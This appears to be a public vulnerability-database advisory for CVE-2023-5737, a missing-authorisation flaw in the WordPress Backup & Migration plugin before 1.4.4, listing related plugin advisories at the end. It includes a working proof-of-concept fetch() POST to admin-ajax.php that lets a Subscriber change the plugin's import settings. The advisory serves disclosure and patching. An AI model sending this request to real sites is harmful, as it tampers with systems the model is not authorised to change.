WordPress Backup & Migration < 1.4.4 – Subscriber+ Plugin Settings Update | CVE 2023-5737 | Plugin Vulnerabilities

Description

The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=100&settings_data%5Bim_db_file_per_req%5D=200&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.

Affects Plugins

wp-migration-duplicator

Fixed in 1.4.4

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

c761c67c-eab8-4e1b-a332-c9a45e22bb13

Timeline

Publicly Published

2023-11-06 (about 6 months ago)

Added

2023-11-06 (about 6 months ago)

Last Updated

2023-11-06 (about 6 months ago)

Other

Published

Title

Published

2024-04-29

Title

Exclusive Addons Elementor < 2.6.9.2 - Missing Authorization to Post Duplication

Published

2024-01-31

Title

Load More Anything < 3.3.4 - Subscriber+ Settings Update

Published

2023-10-25

Title

Ni WooCommerce Sales Report < 3.7.4 - Subscriber+ Sale & Order Reports Access

Published

2024-02-20

Title

Enjoy Social Feed <= 6.2.2 - Subscriber+ Plugin Database Reset

Published

2022-10-19

Title

reSmush.it Image Optimizer < 0.4.4 - Subscriber+ AJAX Calls